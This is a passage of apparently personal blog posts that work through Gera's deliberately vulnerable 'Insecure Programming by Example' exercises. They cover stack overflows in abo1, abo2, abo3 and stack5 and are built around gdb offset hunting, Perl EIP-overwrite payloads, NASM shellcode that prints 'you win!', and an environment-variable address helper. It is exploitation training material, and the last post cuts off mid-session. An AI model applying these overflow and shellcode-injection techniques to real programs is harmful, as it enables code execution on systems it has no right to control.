0x0804842e <main+26>:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048438 <main+36>:   add    eax,0x4
0x0804843b <main+39>:   mov    eax,DWORD PTR [eax]
0x0804843d <main+41>:   mov    DWORD PTR [esp+4],eax
0x08048441 <main+45>:   lea    eax,[ebp-0x118]
0x08048447 <main+51>:   mov    DWORD PTR [esp],eax
0x0804844a <main+54>:   call   0x804831c <strcpy@plt>
0x0804844f <main+59>:   mov    eax,DWORD PTR [ebp+12]
0x08048452 <main+62>:   add    eax,0x8
0x08048455 <main+65>:   mov    eax,DWORD PTR [eax]
0x08048457 <main+67>:   mov    DWORD PTR [esp],eax
0x0804845a <main+70>:   mov    eax,DWORD PTR [ebp-12]
0x0804845d <main+73>:   call   eax
0x0804845f <main+75>:   mov    DWORD PTR [esp],0x1
0x08048466 <main+82>:   call   0x804833c <exit@plt>
End of assembler dump.
(gdb) break 1
Breakpoint 1 at 0x8048414: file abo3.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo3 one two

Breakpoint 1, main (argv=134513684, argc=0x3) at abo3.c:6
6       int main(int argv,char **argc) {
(gdb) x $ebp-12
0xbffff82c:     0xb8000ff4
(gdb) x buf
0xbffff720:     0x080481ac
(gdb) print 0xbffff82c-0xbffff720
$1 = 268
(gdb) delete breakpoints
Delete all breakpoints? (y or n) y
(gdb) break *0x0804845d
Breakpoint 2 at 0x804845d: file abo3.c, line 13.
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') argtwo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo3 $(perl -e 'print "A" x 268 . "BBBB";') argtwo

Breakpoint 2, 0x0804845d in main (argv=3, argc=0xbffff754) at abo3.c:13
13              fn(argc[2]);
(gdb) x $eax
0x42424242:     Cannot access memory at address 0x42424242

Since the program in question isn’t pushing and popping at all, and doesn’t appear to be modifying esp or ebp that much, we can just run the program once real quick from the beginning to populate the registers and determine the offset between our unbounded strcpy destination buf and ebp-12. Once we have the offset, we’ll re-run the program with a quick inline Perl script to print the offset-worth of junk bytes and the string “BBBB” to overwrite ebp-12. I’ve placed a breakpoint directly before the call eax instruction, and at that point we examine eax to confirm that we control execution. Now here is a quickie with shellcode that we’ll reuse from abo1.c.

hacking@hacking-theart:~/InsecureProgramming $ cat abo3shellc.txt
BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with newline and carriage return bytes.
hacking@hacking-theart:~/InsecureProgramming $ nasm -o abo3shellc.bin abo3shellc.txt
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C abo3shellc.bin
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat abo3shellc.bin)
hacking@hacking-theart:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=�Y1��1�C1̀�K̀�����you win!
hacking@hacking-theart:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo3
abo3            abo3.c          abo3shellc.bin  abo3shellc.txt
hacking@hacking-theart:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo3
SHELLCODE will be at 0xbffff9d2
hacking@hacking-theart:~/InsecureProgramming $ ./abo3 $(perl -e 'print "A" x 268 . "\xd2\xf9\xff\xbf";') two
you win!hacking@hacking-theart:~/InsecureProgramming $

Insecure Programming by Example: abo2.c, not vulnerable…o rly?

Introduction

Note 02/13/2010: This post has been a long time coming (started on 01/15 I think), I’m sorry for the delay. At first, it took me a while to (SPOILER, YOU WILL DIE ALONE) find out that abo2.c was not exploitable under x86 due to the exit() call…I saw this immediately, but it took me a while to believe it. Then, I researched other possible ways it could be exploited, and then searched around for a machine on which to test. I ended up cutting the post short from what I had intended, because I couldn’t get my hands on a PA-RISC machine to test with, and QEMU support for PA-RISC is not quite there yet. The post may be a bit rough, any mistakes are all mine, and I’ll gladly accept corrections anywhere they are needed.

After a long time of head banging (and not the good kind), I finally have something good to report in regards to abo2.c, and I figured I’d write it all up for your enjoyment. Here’s the deal, abo2.c is not vulnerable to code execution on Linux using x86 architectures (the important bit here is x86, not so much Linux). That doesn’t mean it can’t be exploited…these are definitely not the same thing. Many folks state (correctly) that abo2.c is not vulnerable under x86 and then move on.

My thought process is that in my dream job, I’d be working with more architectures than just x86, so why limit myself? Keep in mind the object of the game. You are supposed to win, not just learn a valuable lesson. Ok, so if you just move on, you get the bit about why exit() is a deal breaker…big deal. Why not learn to win? Why not examine some different techniques that could have been applied if this code had been slightly different, or different techniques that could be applied (even better) with the code completely unchanged but compiled on a different processor architecture? The goal is to win and to learn something, so let’s do both! 😉

Let’s talk about the code real quick, and why it’s not vulnerable.

/* abo2.c                                       *
 * specially crafted to feed your brain by gera */

/* This is a tricky example to make you think   *
 * and give you some help on the next one       */

int main(int argv,char **argc) {
	char buf[256];

	strcpy(buf,argc[1]);
	exit(1);
}

What’s new here, as opposed to the abo1.c exercise which we successfully exploited only…weeks ago (I haven’t posted in a while, jeebus)? The only difference is a call to the exit() function at the end of the code. That is a real deal breaker for x86 exploitation, let’s examine why this is the case quickly.

You’ll recall that we’ve been reliably exploiting all of our vulnerable programs so far by overwriting the return address which is saved on main()’s stack frame (frame #0). The thing is, exit never returns to the main() function. As a matter of fact, if you disassemble the main() function you’ll see that there is nothing below the call to exit.

(gdb) disas main
Dump of assembler code for function main:
0x080483b4 :    push   ebp
0x080483b5 :    mov    ebp,esp
0x080483b7 :    sub    esp,0x118
0x080483bd :    and    esp,0xfffffff0
0x080483c0 :   mov    eax,0x0
0x080483c5 :   sub    esp,eax
0x080483c7 :   mov    eax,DWORD PTR [ebp+12]
0x080483ca :   add    eax,0x4
0x080483cd :   mov    eax,DWORD PTR [eax]
0x080483cf :   mov    DWORD PTR [esp+4],eax
0x080483d3 :   lea    eax,[ebp-0x108]
0x080483d9 :   mov    DWORD PTR [esp],eax
0x080483dc :   call   0x80482c4
0x080483e1 :   mov    DWORD PTR [esp],0x1
0x080483e8 :   call   0x80482d4
End of assembler dump.

What this means is that execution never returns to the original program from exit. You can verify this behavior yourself by trying to set a breakpoint after exit, or trying to step over the call to exit, you’ll see that the program merely exits. We can’t overflow the return address and have it matter, because the processor will never get back there. Game over man, game over.

The only way to beat this would be to prevent exit() from being called, which is a valid strategy that we should explore. To me, that still fulfills the idea of “gaining control”, sometimes preventing a program from doing something is just as important as making a program do something else…you think that all the crackers out there make programs authenticate themselves fraudunlently, or just prevent them from authenticating the validity of the license? Either path has merit.

Insert Coin to Continue

I was a big fan of arcade games growing up. I had a mean hadouken and dragon punch. Part of getting pretty good at arcade games was not giving up. Keep putting in coins. Keep playing. Get better. If some bastard had the machine monopolized and was beating all comers, well, beg your parents for change, because nothing would make you good faster than getting the tar kicked out of you. For me, abo2.c is that bastard at the machine.

If I have one regret about how I handled this exercise, it’s that I spent too much time pondering and not enough time on the debugger. Too much time Googling, not enough time GDBing. This exercise taught me to not be afraid of disassembling everything, even libc calls, to determine the flow of execution, and it also taught me that the assembled code is really what matters. In the end, I wasted a lot of time re-thinking thoughts when I already knew the answer, abo2.c was NOTVULN on x86 Linux (at least, not vulnerable to code execution…a Denial-of-Service condition exists of course by way of segmentation fault). Once a friend helped me see that this was the case (thanks @kpyke), I resolved to beat the program anyway, in any way I could. I also learned some new stuff I’d like to show you which looked at first blush like solutions on x86, but ended up being inadequate.

What Could Have Been

From “Overwriting the .dtors section.” by Juan M. Bello Rivas:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

static void bleh(void);

int
main(int argc, char *argv[])
{
        static u_char buf[] = "bleh";

        if (argc < 2)
                exit(EXIT_FAILURE);

        strcpy(buf, argv[1]);

        exit(EXIT_SUCCESS);
}

void
bleh(void)
{
        printf("goffio!\n");
}

This paper details the process of exploiting situations in which you may not control execution via arbitrary memory writes OR return address overwrites. This paper taught me a lot in reading it even though it wasn’t a solution for abo2.c on x86, I suggest you read it as well and I figured it was worth outlining what it could have been a solution to.

Note the differences; he’s declared the buf character array as a static variable, and declared it initialized (with value/data) as well. When he does this, the variable is no longer located on the stack, since by definition a static variable must persist through a stack frame and be available to other functions that wish to use it. The variable ends up residing in the .data section of the executable file, and in older versions of GCC (used at the time of the writing of the paper, but no longer the case since at least 2006, if not earlier) .data comes before .dtors in memory. What is .dtors? .dtors is a mnemonic for “destructors” (while .ctors is for “constructors”), in the C programming language you have constructors and destructors, which are attributes you can assign to a function to have it be automatically executed on enter or exit (for instance, to clean up allocated memory on the heap or something like that which C does not do automatically). The .dtors and .ctors sections are the GCC implementation of constructors for the ELF file format. Even if there are no constructor or destructor attributes defined in the program, GCC still defines the .dtors section in an ELF file, it just leaves the section empty. When destructors are called, the program jumps execution to an address described in the .dtors section, if it hits NULL bytes it does nothing. Here is what an empty .dtors section looks like:

$ objdump -s -j .dtors bleh

bleh:     file format elf32-i386

Contents of section .dtors:
 804955c ffffffff 00000000                    ........

To make it quick(er), if we overwrite the value 00000000 with an address containing instructions, that address will be jumped to on program exit. If we place our shellcode in an environment variable (see my post on abo1.c or stack5.c for details), we can simply overwrite with the address of the shellcode and execute whatever we wish, or as in the author’s example we can redirect execution flow to another function in memory that otherwise would not be hit. Remember that our statically-declared variable buf is right next to .dtors in memory, and since strcpy() is not doing bounds checking, we can overwrite it after we determine the offset and execute arbitrary code. The paper really is a fun read, I suggest you take a look.

It is also worth mentioning one more paper that is unfortunately not applicable here, but is still an interesting read. “How to hijack the Global Offset Table with pointers for root shells” by c0ntex is an excellent overview of the concepts regarding the Procedure Linkage Table and the Global Offset Table, two ripe areas for controlling execution if you are fortunate enough to be able to overwrite the pointers contained therein. In short, the PLT and GOT are essentially how a given program knows where to find a shared library call (such as exit in libc). If we could overwrite the pointers in the table, we could execute arbitrary code in place of the call to exit(). Unfortunately, abo2.c does not present an opportunity to do this, nor do stack buffer overflows in general. A format string bug would probably be the best way to execute this attack, so far as I know, but it’s still a very interesting read that I encountered doing research for this article.

Architecture is Important

All of our examples so far have been exploited on an x86 virtual machine (powered by the great free tool VirtualBox) running an old, vulnerable version of Linux with many security features disabled, such as non-executable stack protection, or address space layout randomization. But in this case, we’ve merely been defeated by the design of the x86 stack. Due to the way the stack is arranged in memory, and the fact that our overflowed buffer is located therein, there is nothing we control that gives us any value.

What if we compiled it on a different architecture? Would it work then? How about an architecture that arranged it’s stack differently. Some architectures don’t actually store the stack in main memory, some of them (such as ARM) implement the stack in registers, which I suppose speeds things up, but limits the amount of data that can be stored therein (just speculation, I know dick all about most of this stuff ;-), I’m sure there’s a trade-off though). Some processors do not grow the stack from high-to-low memory addresses, they instead grow it from low-to-high just like other constructs such as the heap. What this means is that those processors are protected from return-address overwrites, because the return addresses are actually on lower addresses than the beginning of the vulnerable buffer. That does not mean that the processor is a safe haven for unbounded functions, though, not at all.

You probably already realize what this means if you’ve been following along and paying attention. This means that we can overwrite the return address of the strcpy() function itself. This means that we never need to leave the strcpy() function to gain control (conceptually, at least), and that we don’t have to wait for the end of the program (main’s return address) like we do on x86. This means that we’ll never get to the exit() call, and that abo2.c is exploitable under certain conditions. In researching this technique, I found out that it’s been done through Phrack #58 Article 11 by Zhodiac, and that it’s a really good read if you’ve never done any low level work on “exotic” architectures. So, instead of doing the exploit myself (mainly due to lack of resources, PA-RISC machines are ~$200.00 on eBay and virtualization is essentially non-existent), I’ll just recommend you give Zhodiac’s paper a read.

Man, I’m glad this post is done with. Procrastination is the devil, on to the next challenge!

Insecure Programming by Example: Advanced Buffer Overflows 1

Introexecuduction

Ok, after a nice break, I’m ready to…break :-). I have a couple of Python related posts in my docket, but today we’re going to start work on the next exploit exercises by Gera in his Insecure Programming by Example series, Advanced Buffer Overflows! I hope they aren’t too advanced. This should be refreshing to write about, because I havent done any of these yet. On to the code!

Gera says:
Advanced Buffer Overflow #1

blind obedience

What would happen if you store 512 characters where there is only space for 256? You may claim that you can’t, and you’ll be right, but still, there are situations that, unconsciously, you tell the micro to do so, and he can only but obey you… and he’ll do his best without thinking of side effects. Now is when we get technical, fasten your seat belts, this turbulence will last forever.

What defines a buffer overflow is the copy of a memory region into another region not big enough to contain it.

/* abo1.c                                       *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced...    */

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

Gera continues:
This is a good and simple abo: on execution this program will copy the contents of argc[1] *1, whatever it is, into the reserved 256 bytes named buf, strcpy() will not do any checks of any kind, it will just copy bytes from source to destination, from argc[1] to buf, until it finds a zero. Here, a chance is given for us to supply a longer-than-expected argc[1] to write in memory past the end of the reserved space named buf. Why is this a security problem? becouse we can change data that we shouldn’t be able to, and usually, this data we can change has a very special meaning for the micro, and by exploiting this meaning, we can confuse the micro and make it do what we want. That’s the secret, go get a debugger, a compiler, and all the tools you think you’ll need, and find out what’s the data after buf and why it’s so important to be able to modify it.

1 – argc and argv are just names for main’s arguments, they just name chunks of bits in memory, their names are not meaningful by their own but for their context.

On a side note, I’m not sure why this compiles correctly without doing #include <stdio.h> but it does work with even a really old version of gcc. Either way, the notes that Gera provides are well worth reading and understanding. This is actually a fairly easy piece of code to exploit, given what we’ve worked with previously in the stackN.c series. We’ll actually re-use our shellcode from that series to print out “you win!” upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use here.

Exploitimitation

The only change of note for this vulnerable piece of software is the use of the strcpy() function. You may remember we discussed earlier why this function, along with gets() and a bunch of others, is not a good idea to use. It is the use of the strcpy() function that allows us to overflow the buffer, as it does not do bounds-checking on input to the buffer. This function just copies whatever you give it to the buffer, the copy continues unchecked, and can be used in a similar way as our gets() function was used to overwrite other areas on the stack (or beyond) to gain control over EIP and hence program execution.

What we’re going to do is this:

  1. Determine the location in memory of the variable buf.
  2. Determine the location in memory of the saved EIP within the stack frame for the call to the main() function, using our debugger GDB.
  3. Determine the offset (number of bytes) we need to overflow the saved EIP by subtracting the address of the saved EIP from the beginning address of the buf array. It’s worth noting here that the stack grows from higher addresses to lower addresses (whereas the heap grows in reverse direction), but it takes data from low-to-high just like anything else, which is something that will take you a while to get into your head permanently. A good (but old) document describing this is at tldp.org, and a thorough overview can be found at linux-mm.org.
  4. Through the first command line argument (a.k.a. argc[1]), send data which will hopefully cause the program to print out “you win!” upon exiting the strcpy() function.

Let’s get started by compiling the code and examining it in GDB to determine the locations in memory we are concerned with. I will be compiling the binary with the -static option, which will compile all of the external libc calls inline, it makes things a bit easier to see sometimes in GDB, but do whatever works for you.

hacking@hacking:~/InsecureProgramming $ gcc -ggdb -static -o abo1 abo1.c
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) set disassembly-flavor intel
(gdb) list
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) backtrace
#0  main (argv=2, argc=0xbffff864) at abo1.c:10
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/8x buf
0xbffff510:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff520:     0x41414141      0x41414141      0x41414141      0x41414141

We can see in the highlighted lines the address of the various points we are interested in, also we can see that after we have already exited the strcpy() function, that the buffer is indeed containing a bunch of “A” characters (0x41). Now that we know where everything is, we can do a bit of arithmetic and determine what our offset is, and then we can get along to deploying our simple shellcode to take control of the EIP register and make it do what we want.

hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/x buf
0xbffff510:     0x41414141
(gdb) print 0xbffff61c - 0xbffff510
$1 = 268
(gdb) quit
The program is running.  Exit anyway? (y or n) y
hacking@hacking:~/InsecureProgramming $ perl -e 'print &quot;A&quot; x 268 . &quot;BBBB\n&quot;;'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, main (argv=0, argc=0xbffff764) at abo1.c:10
10      }
(gdb) next
0x42424242 in ?? ()

Now that we have proven control over EIP by overflowing it with “B” characters (0x42), we can deliver the shellcode as described in previous tutorials.

Whiskey Tango Foxtrot?

There is one problem left to solve, it appears that the variable addresses for the regular runtime of the program differ from the variable addresses while in GDB. Since this code doesn’t print out the variable addresses at runtime like the stackN.c examples, and since we don’t want to modify the source to do so in the spirit of the exercise, we have to find another reliable way to exploit the program. There are some tricks we can employ here by placing our shellcode into an environment variable, and then using the getenv() C library call to determine the location of that environment variable in the program’s memory. All programs executed from Bash (or any shell, really) seem to load the environment variables defined in the shell (viewable with the env command) directly into the memory of any process run as a child of that shell. Once we have the location of the shellcode in the environment variable, we can overwrite the value of EIP with that location and successfully exploit the program. This technique is described in greater detail in Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson (if you can’t tell, this is a pretty good book). Indeed, the getenvaddr.c we’re going to use below is provided for free from the book’s website. But if you’re following along with me here, you should really read this book in it’s entirety.

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc &lt; 3) {
		printf(&quot;Usage: %s &lt;environment variable&gt; &lt;target program name&gt;\n&quot;, argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf(&quot;%s will be at %p\n&quot;, argv[1], ptr);
}

We can then load our shellcode into an environment variable and overflow the buffer repeatedly with the determined address of the shellcode, which provides us with much win. I hope this was a pretty informative post, and I really hope you all who are following along (all two of you) consider purchasing these books I’m outlining, they are pretty invaluable as a central collection of knowledge. On to the next challenge!

hacking@hacking:~/InsecureProgramming $ cat abo1_shellcode.s
BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
pop ecx           ; Pop  the return address (string ptr) into ecx.
xor eax, eax      ; Zero  out full 32 bits of eax register.
mov al, 4         ; Write  syscall #4 to the low byte of eax.
xor ebx, ebx      ; Zero out ebx.
inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
xor edx, edx
mov dl, 8        ; Length of the string
int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx          ; Decrement ebx back down to 0 for status = 0.
int 0x80         ; Do syscall: exit(0)

one:
call two   ; Call back upwards to avoid null bytes
db &quot;you win!&quot; ; with newline and carriage return bytes.
hacking@hacking:~/InsecureProgramming $ nasm -o abo1_shellcode abo1_shellcode.s
hacking@hacking:~/InsecureProgramming $ hexdump -C abo1_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking:~/InsecureProgramming $ export SHELLCODE=$(cat abo1_shellcode)
hacking@hacking:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=? Y1?? 1?C1?? K??????you win!
hacking@hacking:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo1
SHELLCODE will be at 0xbffff9e1
hacking@hacking:~/InsecureProgramming $ ./abo1 $(perl -e 'print &quot;\xe1\xf9\xff\xbf&quot; x 75;')
you win!hacking@hacking:~/InsecureProgramming $

Insecure Programming by Example: shellcode & stack5.c

Introduction

Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08x\n", &buf, &cookie);
        gets(buf);

        if (cookie == 0x000d0a00)
                printf("you loose!\n");
}

So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?

The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.

Epic Sploits

It’s worth mentioning that these programs are purposely designed to be exploited. And the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no experience in this line of work professionally, it cannot all be this straight forward. If you want an example of something truly advanced, explained so even I can grasp the basics, I’d go check out Thomas Ptacek’s write up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.

So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.

Shellc0dage

There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are very many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation‘s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.

Abstractions of Abstractions

NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.

So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls.  Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and return. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.

NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is valid, because they are used two completely different ways, and are even parts of a different set of standards each. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down as all do at some point.

The next layer up is kernel system calls. System calls are convenient pointers to groups of assembly instructions (implemented as a system library typically in /lib) that “do stuff” with the given arguments, but they are not inherent to the x86 processor, rather they are inherent to the kerneland operating system that you are using at the time. They invariably are implemented in assembly (I suppose everything is, eventually), and their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls at all (except through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.

The final and highest layer of abstraction we’ll deal with is the C standard library functions, implemented through the various header files located typically in /usr/include on your average Linux distribution. The C standard library is defined through an ISO standard, and each operating system that wants to use C capabilities past what the compiler provides (as an interface to assembly instructions for allocating and managing memory) in a way consistent with other operating systems or kernels needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C, and implemented in libc, accessible to all processes at a predictable location in memory.

Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on, in the meantime if you want to do some extracurricular reading, I would say a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago, it’s a bit above my head but it will serve you well if you ever need to look something up…ever.  If you want a more gentle introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike, I read this book and really liked it.

Enough Edumacation, Let’s Break Shit

Now I’m going to briefly outline how to build the shellcode we’re going to use, and then again briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. This is not super important for the gets() function, but if you are using something like strcpy() in the future or something else null terminated to get your shellcode into memory it will prematurely terminate the function.

We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.

Assembly code can be written using mnemonics, which are basically English-like direct correlations to a one-byte number that is the actual machine language that the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free version called the Netwide Assembler.

section .data  ; data segment
msg   db "you win!", 0x0a, 0x0d ; the string to print with newline at the end

section .text  ; text segment, where the code is
global _start  ; default entry point for ELF linking

_start:
; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
mov eax, 4  ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
mov ebx, 1  ; put 1 into EBX, since file descriptor we want is STDOUT
mov ecx, msg   ; Put the address of the string pointer into ECX, since it's what we want to print
mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with crlf at the end)
int 0x80 ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
mov eax, 1  ; put 1 into EAX since exit() is syscall #1
mov ebx, 0  ; put 0 into EBX, since that's our one and only argument to exit()
int 0x80 ; tell the kernel to do a syscall

The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.

hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
